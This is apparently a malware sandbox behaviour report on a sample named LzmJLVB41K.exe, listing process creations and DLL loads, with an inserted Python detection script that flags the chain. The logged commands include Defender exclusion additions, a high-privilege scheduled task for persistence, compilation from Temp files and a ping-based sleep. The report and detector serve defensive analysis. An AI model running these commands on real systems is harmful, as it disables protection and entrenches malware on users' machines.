Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe'
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe'
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe'
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6584.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A18.tmp" "c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
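The process-creation lines above record the whole chain in clear text: a scheduled task that re-launches the C:\Recovery copy every 8 minutes with /rl HIGHEST, one Add-MpPreference exclusion for each dropped copy and for the original sample, two csc.exe compiles driven by .cmdline files under Temp, and a batch file in Temp that runs chcp 65001 and ping -n 10 localhost as a sleep before starting fontdrvhost.exe. The following Python script is an added example, not the sandbox's own logic and not any vendor's rule set: it runs five command-line rules over (parent, command line) events transcribed from the lines above. The regexes, the 15-minute schedule threshold and the list of expected task-target directories are this example's assumptions.

```python
"""Command-line rules for the process-creation chain recorded above.

Added example, not the sandbox's own logic. EVENTS is transcribed from the
report's "Process created" indicators; regexes and thresholds are this
example's assumptions.
"""
import re

SCHTASKS_RE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)
# /tn, /sc, /mo, /tr, /rl and their (possibly quoted) values.
SCHTASKS_ARG_RE = re.compile(r'/(tn|sc|mo|tr|rl)\s+("[^"]*"|\S+)', re.I)
MPPREF_RE = re.compile(
    r"""Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+['"]?([^'"]+)""", re.I)
PING_RE = re.compile(r"\bping(?:\.exe)?\s+-n\s+(\d+)\s+(?:localhost|127\.0\.0\.1)\b", re.I)
CSC_RE = re.compile(r'\\csc\.exe"?.*@"?([^"]*\\Temp\\[^"]*\.cmdline)', re.I)
BAT_RE = re.compile(r'\\cmd\.exe"?\s+/c\s+"?([^"]*\\Temp\\[^"]*\.bat)', re.I)

# Where a legitimately installed scheduled-task target usually lives (assumption).
EXPECTED_TASK_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
MAX_BENIGN_INTERVAL_MIN = 15  # assumption: tighter loops than this are rare for real software


def _unquote(value):
    return value.strip().strip('"').strip("'")


def schtasks_args(cmd):
    """Parse the schtasks switches this rule cares about into a dict."""
    return {k.lower(): _unquote(v) for k, v in SCHTASKS_ARG_RE.findall(cmd)}


def evaluate(cmd):
    """Return [(rule_id, detail), ...] for one command line."""
    hits = []

    if SCHTASKS_RE.search(cmd):
        args = schtasks_args(cmd)
        target = args.get("tr", "")
        sc, mo = args.get("sc", "").lower(), args.get("mo", "")
        every = int(mo) if sc == "minute" and mo.isdigit() else None
        if (args.get("rl", "").lower() == "highest"
                and every is not None and every <= MAX_BENIGN_INTERVAL_MIN
                and not target.lower().startswith(EXPECTED_TASK_DIRS)):
            hits.append(("persistence.schtasks_highest_minute",
                         f"{args.get('tn')} every {every} min -> {target}"))

    m = MPPREF_RE.search(cmd)
    if m:
        hits.append(("defense_evasion.defender_exclusion", f"{m.group(1)}={m.group(2).strip()}"))

    m = PING_RE.search(cmd)
    if m and int(m.group(1)) >= 5:
        # ping -n N localhost waits roughly N-1 seconds between echoes.
        hits.append(("defense_evasion.ping_sleep", f"~{int(m.group(1)) - 1}s"))

    m = CSC_RE.search(cmd)
    if m:
        hits.append(("execution.csc_compile_from_temp", m.group(1)))

    m = BAT_RE.search(cmd)
    if m:
        hits.append(("execution.batch_from_temp", m.group(1)))
    return hits


def run(events):
    """Apply evaluate() to (parent, command line) pairs; keep only hits."""
    return [(parent, rule, detail)
            for parent, cmd in events
            for rule, detail in evaluate(cmd)]


DROPPER = r"C:\Users\user\Desktop\LzmJLVB41K.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Transcribed from the report's "Process created" lines.
EVENTS = [
    (DROPPER, r'''schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f'''),
    (DROPPER, r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"'),
    (DROPPER, r""""powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'"""),
    (DROPPER, r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat"'),
    (CMD, r"chcp 65001"),
    (CMD, r"ping -n 10 localhost"),
    (CMD, r'"C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for parent, rule, detail in run(EVENTS):
        print(f"{rule:40} {detail}")
```

Each rule fires on one process-creation event in isolation; the report's value is that all five fire under a single parent within seconds, so a correlating layer that keys on the parent process (here C:\Users\user\Desktop\LzmJLVB41K.exe and the cmd.exe it spawns) turns five medium-confidence hits into one high-confidence incident.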
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Section loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: mscoree.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: apphelp.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: kernel.appcore.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: version.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: uxtheme.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: windows.storage.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: wldp.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: profapi.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: cryptsp.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: rsaenh.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: cryptbase.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: sspicli.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: mscoree.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: kernel.appcore.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: version.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: uxtheme.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: windows.storage.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: wldp.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: profapi.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: cryptsp.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: rsaenh.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: cryptbase.dll
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe Section loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: mscoree.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: apphelp.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: kernel.appcore.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: version.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: uxtheme.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: windows.storage.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: wldp.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: profapi.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: cryptsp.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: rsaenh.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: cryptbase.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: sspicli.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: mscoree.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: kernel.appcore.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: version.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: uxtheme.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: windows.storage.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: wldp.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: profapi.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: cryptsp.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: rsaenh.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: cryptbase.dll
                            Source: C:\Recovery\ctfmon.exe Section loaded: sspicli.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: mscoree.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: apphelp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: kernel.appcore.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: version.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: uxtheme.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: windows.storage.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: wldp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: profapi.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: cryptsp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: rsaenh.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: cryptbase.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: sspicli.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: mscoree.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: kernel.appcore.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: version.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: uxtheme.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: windows.storage.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: wldp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: profapi.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: cryptsp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: rsaenh.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: cryptbase.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe Section loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: version.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: wldp.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: profapi.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: version.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: wldp.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: profapi.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe Section loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
